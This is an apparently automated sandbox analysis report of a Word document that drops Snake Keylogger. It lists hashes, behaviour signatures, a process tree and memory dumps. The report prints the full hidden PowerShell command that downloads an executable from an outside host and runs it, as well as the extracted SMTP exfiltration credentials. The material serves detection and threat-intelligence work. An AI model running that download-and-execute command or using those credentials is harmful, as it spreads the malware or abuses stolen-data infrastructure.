snakekeylogger | 574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5

Analysis

max time kernel
270s
max time network
176s
platform
windows7_x64
resource
win7v20210408
submitted
23-07-2021 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Specifications_Details_202300_RFQ.doc
Size

238KB
MD5

9efbd937ce6f8fef4ad85ee94d9cfd47
SHA1

d8eb24e90091238e2f6bd204ea67d54c5c4efdb6
SHA256

574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5
SHA512

86e2b112d30a010096fca79fea0bdbd1c927a7548ea172f8e9d763bcca54216b836ae9edd960d9c844ebd862c48360d4c11ef86d6a3822ebd9e469c8ac3d694e

Score

10^/10

snakekeylogger keylogger persistence stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
netjul.xyz
Port:
587
Username:
silyatwo@netjul.xyz
Password:
Q;QcczP{&6=~

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1456	1848	cmd.exe	WINWORD.EXE

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

twodark.exe

pid process

536 twodark.exe
Loads dropped DLL 1 IoCs

Processes:

twodark.exe

pid process

1932 twodark.exe

pid	process
536	twodark.exe

pid	process
1932	twodark.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

twodark.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrom = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrom\\chrom.exe\""	twodark.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 checkip.dyndns.org
14 freegeoip.app
15 freegeoip.app
Suspicious use of SetThreadContext 1 IoCs

Processes:

twodark.exe

description pid process target process

PID 1932 set thread context of 536 1932 twodark.exe twodark.exe
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

flow	ioc
9	checkip.dyndns.org
14	freegeoip.app
15	freegeoip.app

description	pid	process	target process
PID 1932 set thread context of 536	1932	twodark.exe	twodark.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

2016 PING.EXE
1632 PING.EXE
1128 PING.EXE
1624 PING.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1848 WINWORD.EXE

pid	process
2016	PING.EXE
1632	PING.EXE
1128	PING.EXE
1624	PING.EXE

pid	process
1848	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exe

pid	process
1680	powershell.exe
1680	powershell.exe
752	powershell.exe
752	powershell.exe
1356	powershell.exe
1356	powershell.exe
1372	powershell.exe
1372	powershell.exe
992	powershell.exe
992	powershell.exe
1932	twodark.exe
1932	twodark.exe
536	twodark.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exe

description	pid	process
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	1932	twodark.exe
Token: SeDebugPrivilege	536	twodark.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1848 WINWORD.EXE
1848 WINWORD.EXE

pid	process
1848	WINWORD.EXE
1848	WINWORD.EXE

Suspicious use of WriteProcessMemory 57 IoCs

Processes:

WINWORD.EXEcmd.exepowershell.exetwodark.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1848 wrote to memory of 1456	1848	WINWORD.EXE	cmd.exe
PID 1848 wrote to memory of 1456	1848	WINWORD.EXE	cmd.exe
PID 1848 wrote to memory of 1456	1848	WINWORD.EXE	cmd.exe
PID 1848 wrote to memory of 1456	1848	WINWORD.EXE	cmd.exe
PID 1456 wrote to memory of 1680	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1680	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1680	1456	cmd.exe	powershell.exe
PID 1456 wrote to memory of 1680	1456	cmd.exe	powershell.exe
PID 1848 wrote to memory of 664	1848	WINWORD.EXE	splwow64.exe
PID 1848 wrote to memory of 664	1848	WINWORD.EXE	splwow64.exe
PID 1848 wrote to memory of 664	1848	WINWORD.EXE	splwow64.exe
PID 1848 wrote to memory of 664	1848	WINWORD.EXE	splwow64.exe
PID 1680 wrote to memory of 1932	1680	powershell.exe	twodark.exe
PID 1680 wrote to memory of 1932	1680	powershell.exe	twodark.exe
PID 1680 wrote to memory of 1932	1680	powershell.exe	twodark.exe
PID 1680 wrote to memory of 1932	1680	powershell.exe	twodark.exe
PID 1932 wrote to memory of 752	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 752	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 752	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 752	1932	twodark.exe	powershell.exe
PID 752 wrote to memory of 2016	752	powershell.exe	PING.EXE
PID 752 wrote to memory of 2016	752	powershell.exe	PING.EXE
PID 752 wrote to memory of 2016	752	powershell.exe	PING.EXE
PID 752 wrote to memory of 2016	752	powershell.exe	PING.EXE
PID 1932 wrote to memory of 1356	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 1356	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 1356	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 1356	1932	twodark.exe	powershell.exe
PID 1356 wrote to memory of 1632	1356	powershell.exe	PING.EXE
PID 1356 wrote to memory of 1632	1356	powershell.exe	PING.EXE
PID 1356 wrote to memory of 1632	1356	powershell.exe	PING.EXE
PID 1356 wrote to memory of 1632	1356	powershell.exe	PING.EXE
PID 1932 wrote to memory of 1372	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 1372	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 1372	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 1372	1932	twodark.exe	powershell.exe
PID 1372 wrote to memory of 1128	1372	powershell.exe	PING.EXE
PID 1372 wrote to memory of 1128	1372	powershell.exe	PING.EXE
PID 1372 wrote to memory of 1128	1372	powershell.exe	PING.EXE
PID 1372 wrote to memory of 1128	1372	powershell.exe	PING.EXE
PID 1932 wrote to memory of 992	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 992	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 992	1932	twodark.exe	powershell.exe
PID 1932 wrote to memory of 992	1932	twodark.exe	powershell.exe
PID 992 wrote to memory of 1624	992	powershell.exe	PING.EXE
PID 992 wrote to memory of 1624	992	powershell.exe	PING.EXE
PID 992 wrote to memory of 1624	992	powershell.exe	PING.EXE
PID 992 wrote to memory of 1624	992	powershell.exe	PING.EXE
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe
PID 1932 wrote to memory of 536	1932	twodark.exe	twodark.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1848

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\Documents\frontcheck.bat" "
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1456

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680

C:\Users\Public\Documents\twodark.exe
"C:\Users\Public\Documents\twodark.exe"
4⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:2016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:1128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\SysWOW64\PING.EXE
"C:\Windows\system32\PING.EXE" gooogle.com
6⤵
- Runs ping.exe
PID:1624

C:\Users\Admin\AppData\Local\Temp\twodark.exe
C:\Users\Admin\AppData\Local\Temp\twodark.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:664

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\twodark.exe
MD5
288e4cbacba92f857bfd5cf62692606d

SHA1
21545f749883d4c24b41ef6fe670978acd424dc6

SHA256
7f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233

SHA512
654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\twodark.exe
MD5
288e4cbacba92f857bfd5cf62692606d

SHA1
21545f749883d4c24b41ef6fe670978acd424dc6

SHA256
7f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233

SHA512
654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
e148f49e806e0ed96e2bb71a012e0ac1

SHA1
e333aadf1d0ae51bd5abbdc652610e165bac08a0

SHA256
2b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790

SHA512
27e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
e148f49e806e0ed96e2bb71a012e0ac1

SHA1
e333aadf1d0ae51bd5abbdc652610e165bac08a0

SHA256
2b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790

SHA512
27e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
e148f49e806e0ed96e2bb71a012e0ac1

SHA1
e333aadf1d0ae51bd5abbdc652610e165bac08a0

SHA256
2b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790

SHA512
27e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
e148f49e806e0ed96e2bb71a012e0ac1

SHA1
e333aadf1d0ae51bd5abbdc652610e165bac08a0

SHA256
2b73490f71c81ad0fdfc3123bc6e6743fb4b290105ad105ae91f8d0e53cf3790

SHA512
27e3b5a5dbc9ad948fa7412b284fcc4d366593258a3a0c0f286d0fb0fcba40c4ef3de78e99480a0f6b5de6b1851c989740d1d96d1290e29354d5042588215f8a

Download Submit
C:\Users\Public\Documents\frontcheck.bat
MD5
87ccb0ab85a10b4b9a47b2d0ef0f37c9

SHA1
967fb3ca52c787d984e0e08a2675223c45f96644

SHA256
a046e1c4e6ff5c4f5702cb4581042bae2c0633700fe5637e30b96adb0206bafd

SHA512
4d1d4af7bdf3f7ef5dd734e3d41c6b9b67ea675f6587fa4d2dd0475f37b93b1226ae0aa26c9742e132d4b047272881c2f189cb19e82705c218e982d9bb520dc2

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\twodark.exe
MD5
288e4cbacba92f857bfd5cf62692606d

SHA1
21545f749883d4c24b41ef6fe670978acd424dc6

SHA256
7f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233

SHA512
654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1

Download Submit
memory/536-154-0x0000000000580000-0x0000000000581000-memory.dmp

Filesize
4KB

Download
memory/536-149-0x000000000041FFDE-mapping.dmp

Download
memory/536-152-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/536-148-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/664-92-0x0000000000000000-mapping.dmp

Download
memory/664-93-0x000007FEFBF71000-0x000007FEFBF73000-memory.dmp

Filesize
8KB

Download
memory/752-107-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download
memory/752-104-0x00000000025A0000-0x00000000025A1000-memory.dmp

Filesize
4KB

Download
memory/752-103-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/752-102-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download
memory/752-105-0x00000000047C0000-0x00000000047C1000-memory.dmp

Filesize
4KB

Download
memory/752-106-0x00000000047C2000-0x00000000047C3000-memory.dmp

Filesize
4KB

Download
memory/752-99-0x0000000000000000-mapping.dmp

Download
memory/992-129-0x0000000000000000-mapping.dmp

Download
memory/992-136-0x0000000002160000-0x0000000002DAA000-memory.dmp

Filesize
12.3MB

Download
memory/1128-128-0x0000000000000000-mapping.dmp

Download
memory/1356-116-0x00000000049F2000-0x00000000049F3000-memory.dmp

Filesize
4KB

Download
memory/1356-114-0x0000000002590000-0x0000000002591000-memory.dmp

Filesize
4KB

Download
memory/1356-115-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/1356-109-0x0000000000000000-mapping.dmp

Download
memory/1356-117-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/1356-112-0x0000000000DF0000-0x0000000000DF1000-memory.dmp

Filesize
4KB

Download
memory/1356-113-0x0000000004A30000-0x0000000004A31000-memory.dmp

Filesize
4KB

Download
memory/1372-126-0x00000000049F2000-0x00000000049F3000-memory.dmp

Filesize
4KB

Download
memory/1372-125-0x00000000049F0000-0x00000000049F1000-memory.dmp

Filesize
4KB

Download
memory/1372-119-0x0000000000000000-mapping.dmp

Download
memory/1456-63-0x0000000000000000-mapping.dmp

Download
memory/1624-138-0x0000000000000000-mapping.dmp

Download
memory/1632-118-0x0000000000000000-mapping.dmp

Download
memory/1680-68-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/1680-89-0x0000000006280000-0x0000000006281000-memory.dmp

Filesize
4KB

Download
memory/1680-72-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1680-67-0x0000000002300000-0x0000000002301000-memory.dmp

Filesize
4KB

Download
memory/1680-75-0x00000000056C0000-0x00000000056C1000-memory.dmp

Filesize
4KB

Download
memory/1680-80-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/1680-71-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/1680-81-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1680-82-0x0000000006190000-0x0000000006191000-memory.dmp

Filesize
4KB

Download
memory/1680-90-0x0000000005600000-0x0000000005601000-memory.dmp

Filesize
4KB

Download
memory/1680-65-0x0000000000000000-mapping.dmp

Download
memory/1680-69-0x00000000048E0000-0x00000000048E1000-memory.dmp

Filesize
4KB

Download
memory/1680-70-0x00000000048E2000-0x00000000048E3000-memory.dmp

Filesize
4KB

Download
memory/1848-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1848-60-0x0000000070531000-0x0000000070533000-memory.dmp

Filesize
8KB

Download
memory/1848-59-0x0000000072AB1000-0x0000000072AB4000-memory.dmp

Filesize
12KB

Download
memory/1848-62-0x00000000757C1000-0x00000000757C3000-memory.dmp

Filesize
8KB

Download
memory/1848-146-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1932-139-0x0000000004890000-0x00000000048D9000-memory.dmp

Filesize
292KB

Download
memory/1932-145-0x00000000046E6000-0x00000000046E7000-memory.dmp

Filesize
4KB

Download
memory/1932-144-0x0000000007DC0000-0x0000000007E2E000-memory.dmp

Filesize
440KB

Download
memory/1932-97-0x00000000046D0000-0x00000000046D1000-memory.dmp

Filesize
4KB

Download
memory/1932-94-0x0000000000000000-mapping.dmp

Download
memory/1932-95-0x0000000000110000-0x0000000000111000-memory.dmp

Filesize
4KB

Download
memory/1932-98-0x00000000046D5000-0x00000000046E6000-memory.dmp

Filesize
68KB

Download
memory/2016-108-0x0000000000000000-mapping.dmp

Download